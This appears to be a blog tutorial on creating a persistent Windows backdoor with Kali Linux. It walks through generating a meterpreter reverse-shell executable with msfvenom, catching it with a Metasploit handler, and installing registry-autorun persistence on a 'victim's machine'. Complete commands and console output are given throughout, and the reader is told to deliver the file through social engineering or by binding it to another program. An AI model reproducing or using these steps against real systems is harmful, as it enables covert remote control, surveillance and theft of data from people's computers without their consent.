Recent

How to create persistent backdoor using metasploit in kali Linux

What is backdoor

Before starting i would like to give a brief overview of backdoor. Backdoor is a program which is used to control and monitor victim's computer remotely without being detected. Backdoor is a malicious program that enables hackers to access systems.They can modify files,copy and steal personal information.Backdoor is also known as trap door or trojan horse as wel.

Backdoors are sent to the victims systems either by someone or binded with another program.

In simple words when we

So now that we know what backdoor is lets start.

The tool We are going to use use msfvenom to create payload.So open your terminal and type the following command:

root@seven:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.150.130 LPORT=4444 -f exe >backdoor.exe

Replace LHOST with your ipaddress.

backdoor command

On successful completion a file with backdoor.exe will be created and saved in your home directory..Now open Metasploit.Now we are done with msfvenom.So open your metasploit because this is where we will be doing real work like viewing sessions etc.

Type the following command in terminal:

root@seven:~# msfconsole

Now we need to use handler exploit so type type:

msf > use exploit/multi/handler
use multi

Now set payload to windows meterpreter reverser tcp type:

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
set payload

Set your LHOST(Your IP address)Replace ipaddress with yours.

msf exploit(handler) > set LHOST 192.168.150.130 
LHOST => 192.168.150.130

Set your LPORT

msf exploit(handler) > set LPORT 4444
LPORT => 4444

Now we are all set type exploit. When you type the below command exploit will start and will run in the backround.Once your stage is set we are ready to go further.

Now find a way to send payload that we generated to victim's machine. Use your social engineering skills.When victim clicks we can exploit them.There are couple of ways to send backdoor to victim's machine use your social engineering skills or bind with some other application.

Now below command withh run the exploit and sends it in background.

msf exploit(handler) > exploit -i - j

Now type help command go see the options you can use with victim's machines.As you can see there are plenty of options you can use.

meterpreter > help

Now type the sysinfo to see the victim's system information.

meterpreter > syinfo
[-] Unknown command: syinfo.
meterpreter > sysinfo
Computer        : DARKNIGTHT
OS              : Windows 8 (Build 9200).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter >

As you can see i ran backdoor in my win8 machine to test.And i am getting information remotely.

Now we need to make it persistence. So whenever our victim login we will have our session created. just type the below command to get persistance help menu.You have many options here it's upto you to use them.

  meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host.

OPTIONS:

    -A        Automatically start a matching exploit/multi/handler to connect to the agent
    -L   Location in target host to write payload to, if none %TEMP% will be used.
    -P   Payload to use, default is windows/meterpreter/reverse_tcp.
    -S        Automatically start the agent on boot as a service (with SYSTEM privileges)
    -T   Alternate executable template to use
    -U        Automatically start the agent when the User logs on
    -X        Automatically start the agent when the system boots
    -h        This help menu
    -i   The interval in seconds between each connection attempt
    -p   The port on which the system running Metasploit is listening
    -r   The IP of the system running Metasploit listening for the connect back

Now we need to use -U option to create persistence backdoor. Below command will write script into autorun so whenever your victim logs in a session will be created.

meterpreter > run persistence -U -i 5 -p 4444 -r 192.168.150.130 
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/DARKNIGTHT_20161027.3914/DARKNIGTHT_20161027.3914.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.150.130 LPORT=4444
[*] Persistent agent script is 148428 bytes long
[+] Persistent Script written to C:\Users\ZEEROS~1\AppData\Local\Temp\uXwdPFQQc.vbs
[*] Executing script C:\Users\ZEEROS~1\AppData\Local\Temp\uXwdPFQQc.vbs
[+] Agent executed with PID 3440
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\sYidKTQoKVgpjRD
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\sYidKTQoKVgpjRD
meterpreter >

-r You need to give ip address of your machine.
-i The interval in seconds between each connection attempt

That's it for this tutorial .That was a basic way to create a backdoor. I am definately writing more tutorials on backdoors.Please do share if it helps you.